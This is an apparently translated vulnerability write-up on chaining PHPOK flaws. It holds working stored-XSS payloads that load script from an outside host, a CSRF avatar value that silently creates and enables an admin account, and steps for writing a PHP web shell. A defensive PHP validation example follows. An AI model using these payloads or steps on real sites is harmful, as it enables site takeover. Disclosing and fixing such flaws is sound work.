PHPOK: chaining vulnerabilities to get a shell
1. Two stored XSS
2. Adding an administrator account and password + the exploitation point
3. Writing a shell from the backend
1.
First
Register an account.
The account field contains
A');document.write('<script/src=//t.cn/XXXXXXX></script>')//
After registration, the value appears in the backend.
An administrator has to click it to trigger the XSS.
Second
Message board
Message subject
A');document.write('<script/src=//t.cn/XXXXX></script>')//
This one also needs a click.
2.
Add administrator account + exploitation point
An administrator account can be added in the backend, and this can be done with CSRF.
The avatar address submitted from the front end is not validated.
Click "Modify profile" and capture the request.
Change the avatar value in the POST to
admin.php%3Fc%3Dadmin%26f%3Dsave%26id%3D%26account%3Dwooyun%26pass%3Da123456%26email%3Da123456%26status%3D0%26if_system%3D1
The value in the figure is the URL-decoded content.
Then register an account.
Upload an avatar.
Change the avatar value in the POST to
admin.php%3Fc%3Dadmin%26f%3Dstatus%26id%3D2
When the administrator views the backend, an administrator account is created automatically,
and its status is set to available.
You can then log in to the backend.
3.
The first two parts get you into the backend.
Then write a shell from the backend.
Go to backend style management,
then add a style.
Note that the folder must be one that already exists in the system,
so use the www folder that exists by default.
Write the shell directly to
/Tpl/www/111.php
The code is as follows:
Solution:
Strengthen filtering.
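One way to apply that filtering to the unvalidated avatar address from part 2, as an added example that is not PHPOK's own code. The function names, the res/avatar/ upload prefix and the default image path are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumption: avatars are stored under this relative prefix. PHPOK's real
// upload directory may differ; adjust the prefix to match.
const AVATAR_PATTERN =
    '#\Ares/avatar/(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+\.(?:jpe?g|png|gif)\z#';

/**
 * Hypothetical helper: accept only a relative path to an image file under
 * the upload prefix. Anything with a query string, scheme, "..", percent
 * encoding or another script name fails the allowlist and returns null.
 */
function validate_avatar(string $value): ?string
{
    if (strlen($value) > 255 || preg_match(AVATAR_PATTERN, $value) !== 1) {
        return null;
    }
    return $value;
}

/** Render the avatar for the backend user list, falling back to a default. */
function avatar_img(string $stored): string
{
    $path = validate_avatar($stored) ?? 'res/avatar/default.png';
    // Escape on output as well, so a bad value stored before this check
    // existed cannot break out of the attribute.
    return '<img src="' . htmlspecialchars($path, ENT_QUOTES, 'UTF-8') . '" alt="avatar">';
}

// Constructed sample inputs; the second and third are the form-decoded
// avatar values from part 2 of the write-up.
$samples = [
    'res/avatar/2014/u1024.png',
    'admin.php?c=admin&f=save&id=&account=wooyun&pass=a123456&email=a123456&status=0&if_system=1',
    'admin.php?c=admin&f=status&id=2',
    'res/avatar/../../admin.php',
    '//t.cn/XXXXXXX',
];
foreach ($samples as $s) {
    printf("%-8s %s\n", validate_avatar($s) === null ? 'REJECT' : 'ACCEPT', $s);
}
```

Validating the avatar closes this entry point only. The backend save and status actions should also require POST with a per-session anti-CSRF token, so that loading an image URL cannot change state.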